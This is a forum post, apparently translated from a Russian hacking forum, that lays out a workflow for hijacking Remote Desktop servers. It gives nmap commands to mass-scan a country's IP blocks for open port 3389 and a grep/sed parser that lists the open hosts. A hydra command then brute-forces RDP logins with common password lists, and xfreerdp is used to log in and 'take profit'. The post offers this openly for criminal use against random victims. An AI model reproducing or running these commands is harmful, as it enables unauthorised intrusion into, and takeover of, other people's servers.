Article Looking for the best algorithm for catching dedicated servers 2018

K

kluster

Премиум
02.01.2019
27
51
CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // My experience in capturing dedicated servers

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap up next few rows in script, create a few txt files

http://www.ipdeny.com/ipblocks/ - here you can look on ip block lists for interesting us country but if you will scan all for one time you will see the results only on the next year.
So don't be greedy and scan for a little interest subnet, keeping journal and write scanned diapasons.

Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract ip's with opened RDP port

Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing more funnier than hydra was not found, crowbar gives misses and stunnes,
so upload a few top ten dictionaries (admin - password) Hydra is good because not so more load the processor and can brute all day, all night without pause.
The best solution I think is to exploit sorted ip's with help of Metasploit but it is a theme for another article because fast and standart solutions for this i do not see.

Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // enter to exploited shells and take profit

Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Good Luck and feel free to comment.
We are anonysts we are Legion.

Looking for the best algorithm for catching dedicated servers 2018


source: В поисках лучшего алгоритма по захвату дедиков в 2К18
 
  • Нравится
Реакции: The Codeby
Мы в соцсетях: